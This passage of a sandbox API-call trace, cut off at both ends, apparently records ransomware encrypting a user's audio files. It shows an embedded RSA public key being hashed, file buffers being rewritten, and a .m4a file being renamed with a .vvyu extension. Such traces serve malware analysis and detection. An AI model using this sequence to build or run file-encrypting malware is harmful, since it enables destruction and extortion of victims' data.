hHeap=0x620000) returned 1 [0203.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0203.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0203.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0203.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0203.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0203.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0203.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0203.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0203.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1eb8 | out: hHeap=0x620000) returned 1 [0203.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0203.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0203.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0203.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0203.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0203.247] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x6533, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x6533, lpOverlapped=0x0) returned 1 [0203.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0203.247] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x6538, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.247] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0203.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0203.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0203.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0203.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0203.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.249] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0203.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0203.249] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.249] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0203.249] CloseHandle (hObject=0x510) returned 1 [0203.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0203.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0203.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0203.251] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\6y-Gle7CJ.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\6y-gle7cj.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\6y-Gle7CJ.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\6y-gle7cj.m4a.vvyu")) returned 1 [0203.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.253] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6eb88 | out: hHeap=0x620000) returned 1 [0203.256] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7740e30, ftCreationTime.dwHighDateTime=0x1d8976f, ftLastAccessTime.dwLowDateTime=0x63079670, ftLastAccessTime.dwHighDateTime=0x1d8a0eb, ftLastWriteTime.dwLowDateTime=0x63079670, ftLastWriteTime.dwHighDateTime=0x1d8a0eb, nFileSizeHigh=0x0, nFileSizeLow=0x12821, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a6C7l-Qq0p-ecvc_8DsT.wav", cAlternateFileName="A6C7L-~1.WAV")) returned 1 [0203.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6eb88 [0203.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.256] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\a6C7l-Qq0p-ecvc_8DsT.wav") returned=".wav" [0203.256] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\a6C7l-Qq0p-ecvc_8DsT.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\a6c7l-qq0p-ecvc_8dst.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0203.257] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=75809) returned 1 [0203.257] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0203.260] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x127fb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.260] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0203.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.262] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.262] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x12821, lpOverlapped=0x0) returned 1 [0203.264] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0203.264] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.264] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.264] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0203.265] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0203.265] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0203.265] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0203.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0203.265] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0203.265] GetLastError () returned 0x0 [0203.265] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0203.265] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0203.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.266] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0203.266] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0203.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.266] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0203.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12820) returned 0x2ea99b0 [0203.266] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1eb8 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3740 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1f00 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3758 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3788 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37e8 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37a0 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0203.267] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0203.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0203.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0203.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37e8 [0203.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0203.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37a0 [0203.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0203.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3788 [0203.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0203.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0203.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0203.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0203.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0203.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0203.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0203.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0203.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0203.271] GetCurrentThreadId () returned 0x66c [0203.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0203.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea3ba0 [0203.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0203.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0203.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0203.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0203.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.272] GetCurrentThreadId () returned 0x66c [0203.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0203.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0203.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0203.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0203.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37e8 [0203.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0203.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0203.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0203.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3788 [0203.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0203.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0203.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0203.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0203.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37a0 [0203.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0203.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0203.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0203.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3770 [0203.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0203.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3800 [0203.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0203.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37d0 [0203.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37b8 [0203.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3818 [0203.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37b8 [0203.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0203.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0203.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0203.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3788 [0203.277] HeapFree (in: 